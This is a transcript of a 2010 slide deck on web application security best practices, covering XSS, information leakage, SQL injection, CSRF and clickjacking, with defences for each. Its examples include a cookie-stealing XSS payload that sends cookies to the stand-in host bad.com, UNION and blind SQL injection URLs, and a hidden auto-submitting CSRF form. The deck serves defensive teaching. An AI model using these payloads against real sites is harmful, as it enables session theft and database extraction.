Best practices of web app security (samvel gevorgyan)
-
Upload
clubhack -
Category
Technology
-
view
4.121 -
download
4
Transcript of Best practices of web app security (samvel gevorgyan)
WEB APPLICATION SECURITYBEST PRACTICES OF
by Samvel Gevorgyan
2010
STATISTICS OF VULNERABILITIES
Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html
STATISTICS OF RISK LEVELS
Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html
TOP 10 HIGH LEVEL VULNERABILITIES01. Cross-Site Scripting (XSS) [Symantec - 2007]
02. Information leakage
03. SQL Injection [~2005]
04. Cross-Site Request Forgery (CSRF) [1990s]
05. ClickJacking [J.Grossman and R.Hansen - 2008]
06. Phishing [1987, 1996]
07. Path Traversal or Local/Remote File Inclusion
08. Shell injection
09. Session Hijacking [early 2000s]
10. File uploads
CROSS-SITE SCRIPTING
• DESCRIPTION:Cross-Site Scripting is a type of web application vulnerability when the attacker injects his executable code into the vulnerable website.
• EXAMPLE:http://site.com/search.php?q=<script>alert(“XSS”)</script>
CROSS-SITE SCRIPTING
• TYPES:1. Non-Persistant2. Persistant
1.Non-Persistant:In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.
CROSS-SITE SCRIPTINGNon-PersistantEXAMPLE:
http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script>
ORhttp://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>
CROSS-SITE SCRIPTING2.Persistant:
In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing that data.
Common targets are:• Comments• Chat messages• E-mail messages• Wall posts, etc.
CROSS-SITE SCRIPTINGPersistantEXAMPLE:
CROSS-SITE SCRIPTINGPersistant
Comment in raw format:and I like the way this website developerswork..hahaha :D :D
<SCRIPT/XSS SRC="http://bad.com/xss.js"></SCRIPT>
CROSS-SITE SCRIPTINGPotentially Dangerous HTML elemets:
• src • style • href
• lowsrc
TAGS• <applet> • <body> • <embed> • <frame> • <script> • <frameset> • <html>
• <iframe> • <img> • <style> • <layer> • <ilayer> • <meta> • <object>
ATTRIBUTES
CROSS-SITE SCRIPTINGPotentially Dangerous HTML events:
•Onblur•Onchange•Onclick•Ondrag•Onerror•Onfocus•Onkeypress•Onkeyup•Onload
•Onmouseover•Onmousemove•Onmove•Onresize•Onselectstart•Onselect•Onsubmit•Onunload•Onscroll, etc.
*all HTML events
CROSS-SITE SCRIPTINGSOLUTIONS:• PHP function strip_tags()• PHP Input Filter• PHP libraries:•HTML_Safe• htmLawed• kses• Safe HTML Checker, etc.
BEST SOLUTION
OWASP HTML Purifier:• SAFE
HTML Purifier defeats XSS with an audited whitelist
• CLEANHTML Purifier ensures standards-compliant output
• OPENHTML Purifier is open-source and highly customizable
BEST SOLUTION
COMPARISON:
Source: www.htmlpurifier.org/comparison
BEST SOLUTION
COMPARISON:
Source: www.htmlpurifier.org/comparison
INFORMATION LEAKAGE
• DESCRIPTION:Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.
• EXAMPLE:Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20
INFORMATION LEAKAGE• COUSES OF:
1. Directory listening misconfiguration2. Unproper error handling3. Unproper filetype handling4. Sensitive HTML comments, etc.
1.Directory listening misconfiguration:Leaving directory listening enabled allows the attacker to read the list of all files in a directory.
INFORMATION LEAKAGE
• EXAMPLE:Index of /admin
Directory listening misconfiguration
INFORMATION LEAKAGE2.Unproper error handling:
Because of unproper error handling all the unexpecting requests will generate error messages which will be visible to the attacker.
• EXAMPLE:Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81
INFORMATION LEAKAGE3.Unproper filetype handling:
Unproper filetype handling allows your important files to be readable by the attacker.
• EXAMPLE:• sql_backup.tar.gz• memberlist.xml• phpinfo.html• dbClass.inc• Login.php.bkp
INFORMATION LEAKAGE
EXAMPLE:dbClass.inc…
private $host = "localhost";private $usr = “root“;private $pwd = “i7kT0w“;public $db = "brav_new";public function Connect(){ … }…
Unproper filetype handling
INFORMATION LEAKAGE4. Sensitive HTML comments :
Notes left by web developers may content important information which will cause of the information leakage.
• EXAMPLE:<form enctype="multipart/form-data" action="upload.php" method="POST"><!--check for filetypes php, cgi, pl, bat, exe, dll, reg--><input name="upload_file" type="file" /> …
BEST SOLUTION
Directory listening misconfigurationA. put a blank file named index.html in that
directory.B. put a file named .htaccess in that directory
consisting of only this line:Options –indexesNOTE: all sub-directories of that directory will also get their directory listings turned off.
BEST SOLUTION
Unproper error handlingA. The following configurations should be done in
php.ini file:• error_reporting = E_ALL• display_errors = Off• log_errors = On• error_log = path/PHP_errors.log //any file in
which the web server has write privileges.
BEST SOLUTION
Unproper error handlingB. Create an .htaccess file in public_html directory
with the following lines:php_flag display_errors offphp_flag log_errors onphp_value error_log path/PHP_errors.log<Files path/PHP_errors.log>Order allow,denyDeny from allSatisfy All</Files
BEST SOLUTION
Unproper filetype handlingA. Don’t keep your important files with the
following extentions in your public web directory if you don’t link to them in the website:• Compressed files(*.zip, *.rar, *.tar.gz, etc.)• Database files(*.sql, *.cvs, *.xml, *.xls, etc.)• Unknown files(*.inc, *.copy, *.bkp, etc.)
BEST SOLUTION
Sensitive HTML commentsA. No sensetive HTML comment must be used in a
website as every user will be able to view the webpage source code.
SQL INJECTION
• DESCRIPTION:This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file.
• EXAMPLE:http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--
SQL INJECTION
• TYPES:1. Normal2. Blind
1.Normal:In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.
SQL INJECTION
• EXAMPLE:http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(),5,version(),7+--
Normal SQL Injection
SQL INJECTION
2.Blind:This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response.
• EXAMPLE:http://site.com/view.php?page=10+and+substring(@@version,1,1)=5+--
SQL INJECTION
• PHP.ini configuration•magic_quotes_gpc = on
• PHP functions• filter_var()•mysql_real_escape_string()• sprintf()
• Put variables into the quotes(e.g: ‘$id’)• Assign min privilages for mysql users
SOLUTIONS:
BEST SOLUTION
GreenSQL open source database firewall:• Activity monitoring and audit• User rights management• Real-time database protection• Intrusion preventation(IPS)• Database caching• Encrypted comunication over SSL• Virtual patching• Reporting
BEST SOLUTION
GreenSQL open source database firewall:
CROSS-SITE REQUEST FORGERY
• DESCRIPTION:This vulnerability of web application allows attacker’s website to manipulate its actions using authorized user’s session.
• EXAMPLE:<img src=“http://site.com/share.php?url=http://bad.com” style=“display:none” />
CROSS-SITE REQUEST FORGERYEXAMPLE:
<div style=“display:none”><iframe name=“hidden”></iframe><form name=“Form” action= “http://site.com/post.php” target=“hidden” method=“POST”><input type=“text” name=“message” value=“I like www.bad.com” /><input type=“submit” /></form><script>document.Form.submit();</script></div>
CROSS-SITE REQUEST FORGERY• USELESS DEFANCES:• Only accept POSTStops simple link-based attacks (IMG, frames, etc.)But hidden POST requests can be created with frames, scripts, etc.• Referer checkingSome users prohibit referers, so you can’t just require referer headersTechniques to selectively create HTTP request without referers exist• Requiring multi-step transactionsCSRF attack can perform each step in order
• CAPTHCAsThis is a type of challenge-response test used in computing to ensure that the response is not generated by a computer.• One-time tokensUnlike the CAPTCHA’s system this is a unique number stored in the form field and in session to compare them after submiting the form.
SOLUTIONS:
CROSS-SITE REQUEST FORGERY
BEST SOLUTION
OWASP CSRFGuard
Add Tokento HTML
User(Browser)
Business Processing
OWASPCSRFGuard
Verify Token
1. Add token with regex
2. Add token with HTML parser
3. Add token in browser with
Javascript
• Adds token to:– href attribute– src attribute– hidden field in all forms
• Actions:– Log– Invalidate– Redirect
Source: www.owasp.org/index.php/CSRFGuard
CLICK-JACKING
• DESCRIPTION:This is the advanced version of Cross-Site Request Forgery. It uses all the flexibility of front-end languages to bypass protected forms and send a request using victim’s active session.
• EXAMPLE:<div style="position:fixed; width:100%; height:100%; z-index:999;" onclick="alert(‘ClickJacked');"></div>
CLICK-JACKINGEXAMPLE:
BEST SOLUTION
• FrameKiller(frame busting):<style> html{ display : none; }</style> <script>if( self == top ) { document.documentElement.style.display = 'block' ; } else { top.location = self.location; }</script>
• OWASP CSRFGuard